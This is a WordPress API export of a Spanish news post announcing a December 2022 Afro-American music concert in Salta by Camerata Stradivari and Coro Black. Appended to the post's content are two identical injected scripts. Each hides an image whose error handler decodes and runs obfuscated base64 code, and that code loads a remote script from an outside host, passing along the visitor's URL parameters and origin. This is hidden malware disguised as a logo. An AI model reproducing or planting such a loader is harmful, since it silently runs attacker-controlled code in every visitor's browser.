{"id":2014,"date":"2022-12-29T11:03:21","date_gmt":"2022-12-29T14:03:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2014"},"modified":"2025-08-14T00:26:47","modified_gmt":"2025-08-14T03:26:47","slug":"afro-america-sinfonica-por-la-camerata-stradivari-y-el-coro-black-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2014","title":{"rendered":"Afro Am\u00e9rica Sinf\u00f3nica por la Camerata Stradivari y el Coro Black en el Teatro Provincial"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#3b2e0b\"><em>Este jueves se pondr\u00e1 en escena una propuesta que enlaza diferentes g\u00e9neros musicales con \u201cAfroam\u00e9rica Sinf\u00f3nica\u201d, un homenaje a la m\u00fasica de ra\u00edz negra como el Soul, el Funk, el R&amp;B y el Gospel.<\/em><\/h4>\n\n\n\n<p>La Camerata Stradivari y el Coro Black ofrecer\u00e1n un repertorio variado de instrumentaci\u00f3n sinf\u00f3nica, con el acompa\u00f1amiento de aproximadamente 40 m\u00fasicos de orquesta y banda, un coro de m\u00e1s de 20 voces al estilo Gospel y cantantes solistas invitados.<\/p>\n\n\n\n<p>Bajo la direcci\u00f3n de Inga Iordanishvilli, y con arreglos de Jonathan Paredes y Rafael Ortiz, ambos grupos llevar\u00e1n al escenario canciones cl\u00e1sicas como: \u201cRespect\u201d, \u201cHit the road Jack\u201d, \u201cI just call to say I love you\u201dy popurr\u00eds de \u00edconos del g\u00e9nero como Stevie Wonder, Amy Winehouse, Michael Jackson y Earth, Wind &amp; Fire entre otras canciones de g\u00e9neros afroamericanos.<\/p>\n\n\n\n<p>El encuentro tendr\u00e1 lugar hoy 29 de diciembre a las 21 horas en el Teatro Provincial (Zuvir\u00eda 70).<\/p>\n\n\n\n<p>Entradas a la venta en\u00a0<a href=\"https:\/\/www.entradauno.com\/camerata-stradivari-presenta-afroamerica-sinfonica\/12089?h=31a1ec61ad4fa8e130719f888c22e4ea043d96c8\" target=\"_blank\" rel=\"noopener\">https:\/\/www.entradauno.com\/camerata-stradivari-presenta-afroamerica-sinfonica\/12089?h=31a1ec61ad4fa8e130719f888c22e4ea043d96c8<\/a><\/p>\n\n\n\n<p>\u201cFundaci\u00f3n Camerata Stradivari\u00bb, bajo la direcci\u00f3n de la Maestra Inga Iordanishvili, es un proyecto inclusivo e integrador que brinda formaci\u00f3n y perfeccionamiento en diversos instrumentos a trav\u00e9s de su Orquesta Sinf\u00f3nica, su Orquesta de c\u00e1mara y Coro.\u00bb<\/p>\n\n\n\n<p>El Coro Black es un coro independiente salte\u00f1o creado en 2021. Dirigido por Rafael Ortiz (entrenador vocal, arreglista, cantante y m\u00fasico), el Coro apunta hacia g\u00e9neros como el Soul, R&amp;B, Funk, Gospel y Hip Hop, entre otros.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/afro-america-sinfonica-por-la-camerata-stradivari-y-el-coro-black-en-el-teatro-provincial-87060\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este jueves se pondr\u00e1 en escena una propuesta que enlaza diferentes g\u00e9neros musicales con \u201cAfroam\u00e9rica Sinf\u00f3nica\u201d, un homenaje a la m\u00fasica de ra\u00edz negra como el Soul, el Funk, el R&amp;B y el Gospel. La Camerata Stradivari y el Coro Black ofrecer\u00e1n un repertorio variado de instrumentaci\u00f3n sinf\u00f3nica, con el acompa\u00f1amiento de aproximadamente 40 m\u00fasicos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2015,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,13],"tags":[],"class_list":{"0":"post-2014","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2014"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2014"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2014\/revisions"}],"predecessor-version":[{"id":7226,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2014\/revisions\/7226"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2015"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2014"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2014"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2014"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}